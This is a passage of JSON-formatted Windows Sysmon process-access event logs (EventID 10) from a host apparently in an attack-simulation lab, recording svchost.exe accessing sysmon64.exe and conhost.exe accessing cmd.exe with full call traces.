06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
